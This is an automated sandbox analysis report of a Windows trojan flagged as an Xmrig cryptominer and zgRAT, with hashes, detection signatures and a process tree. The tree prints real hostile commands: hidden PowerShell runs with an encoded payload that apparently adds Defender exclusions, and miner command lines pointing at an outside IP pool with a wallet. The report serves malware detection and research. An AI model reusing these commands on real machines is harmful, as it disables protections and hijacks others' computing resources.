Edit tour
Windows
Analysis Report
e2kLb2J2Y7.exe
Overview
General Information
| Sample Name: | e2kLb2J2Y7.exe |
| Original Sample Name: | 506761d4ae9aa7134c001c7f0b7b4827.exe |
| Analysis ID: | 1345583 |
| MD5: | 506761d4ae9aa7134c001c7f0b7b4827 |
| SHA1: | 45b12d344817ca14e1f630da7f624b2093e7728d |
| SHA256: | 36216f13d2670aadc24589c4810c4ef62e9370a4e3cf05f8015b1beb5e0c4a63 |
| Tags: | 64exetrojan |
| Infos: |   |
 | |
Detection
Xmrig, zgRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Bypasses PowerShell execution policy
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Detected Stratum mining protocol
Suspicious powershell command line found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Classification
- System is w10x64
e2kLb2J2Y7.exe (PID: 3532 cmdline: C:\Users\u ser\Deskto p\e2kLb2J2 Y7.exe MD5: 506761D4AE9AA7134C001C7F0B7B4827)
powershell.exe (PID: 6960 cmdline: powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAA= = MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 2448 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Key.exe (PID: 1824 cmdline:
C:\Users\u ser\AppDat a\Local\Is Invalid\ko eogrk\Key. exe MD5: 506761D4AE9AA7134C001C7F0B7B4827) - InstallUtil.exe (PID: 3928 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\In stallUtil. exe MD5: 909A1D386235DD5F6BA61B91BA34119D)
- powershell.exe (PID: 2632 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAA= = MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- xddtyli.exe (PID: 1492 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\xddtyli .exe MD5: FF4A1FE6224D33770F881A7A96E33C3D)
- powershell.exe (PID: 380 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcACo ALABDADoAX ABXAGkAbgB kAG8AdwBzA FwATQBpAGM AcgBvAHMAb wBmAHQALgB OAEUAVABcA EYAcgBhAG0 AZQB3AG8Ac gBrADYANAB cAHYANAAuA DAALgAzADA AMwAxADkAX ABBAGQAZAB JAG4AUAByA G8AYwBlAHM AcwAuAGUAe ABlACAALQB GAG8AcgBjA GUAOwAgAEE AZABkAC0AT QBwAFAAcgB lAGYAZQByA GUAbgBjAGU AIAAtAEUAe ABjAGwAdQB zAGkAbwBuA FAAcgBvAGM AZQBzAHMAI ABDADoAXAB XAGkAbgBkA G8AdwBzAFw ATQBpAGMAc gBvAHMAbwB mAHQALgBOA EUAVABcAEY AcgBhAG0AZ QB3AG8AcgB rADYANABcA HYANAAuADA ALgAzADAAM wAxADkAXAB BAGQAZABJA G4AUAByAG8 AYwBlAHMAc wAuAGUAeAB lAA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Values.exe (PID: 1056 cmdline:
C:\Users\u ser\AppDat a\Roaming\ RevisionNu mber\Value s.exe MD5: FF4A1FE6224D33770F881A7A96E33C3D) - RegAsm.exe (PID: 7288 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Re gAsm.exe MD5: A4EB36BAE72C5CB7392F2B85609D4A7E) - zhtyxulkfny.exe (PID: 7544 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\zhtyxul kfny.exe MD5: 506761D4AE9AA7134C001C7F0B7B4827) - AddInProcess.exe (PID: 7640 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 7648 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 7656 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 7748 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 7804 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 7816 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 16 3.123.142. 171:8383 - u 44K2HL2w oi2893k79N HDxhSdmL8v LcCcDX5HDn 2F3d7fGrUk kCcQutFNXM 5FtKq8SKUE jnCioyXVgN qSRMHUC9qX 268CRGw.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- Key.exe (PID: 7668 cmdline:
C:\Users\u ser\AppDat a\Local\Is Invalid\ko eogrk\Key. exe MD5: 506761D4AE9AA7134C001C7F0B7B4827)
- cleanup